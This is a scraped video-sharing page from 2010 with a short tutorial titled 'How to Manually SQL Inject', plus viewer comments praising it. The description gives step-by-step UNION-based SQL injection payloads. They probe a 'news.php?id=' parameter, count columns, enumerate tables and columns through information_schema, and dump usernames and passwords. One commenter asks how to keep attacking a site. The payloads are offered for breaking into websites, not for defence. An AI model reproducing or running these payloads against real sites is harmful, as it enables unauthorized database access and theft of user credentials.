Alert icon
We're changing our privacy policy. This stuff matters.  Learn more  Dismiss

How to Manually SQL Inject

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
3,436
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Nov 19, 2010

Steps to Manually SQL Injecting:

1. Find a vulnerable add a ' at the end of the site example: news.php?id=1 add a ' at the end of the 1 and see if you get a syntax error
2. order by 1--
3. union all select 1,2,3,4,5--
4. @@version in vulnerable column
5. union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
6. union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=char(x)--
7. union all select 1,2,3,4,group_concat(username,0x3a,password,0x3c62723e) from column_name--

Side note may need to add a - between like the *.php?id=-#

Category:

Howto & Style

Tags:

License:

Standard YouTube License

  • likes, 1 dislikes

Link to this comment:

Share to:

Uploader Comments (PhiberOptics)

  • Lololooololol

  • @CerealMS Aslong as a bring a laugh or enjoyment to someone in the world then it makes my life happy :P Glad you got a laugh.

see all

All Comments (9)

Sign In or Sign Up now to post a comment!
  • Thx mate, nice tut :)

  • Click click click :D

  • Dude you rule this is the best tutorial evar!!

  • good tut

  • Dude you are fucking awesome. MUCH better tutorial than all the others. Cheers

  • what if the website is vunerable because it gave error when i put ' at the end and i have gone past order by 30-- or something like order by 30/* and it still hasn't give me a error? should i keep going ?

  • Cool

Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more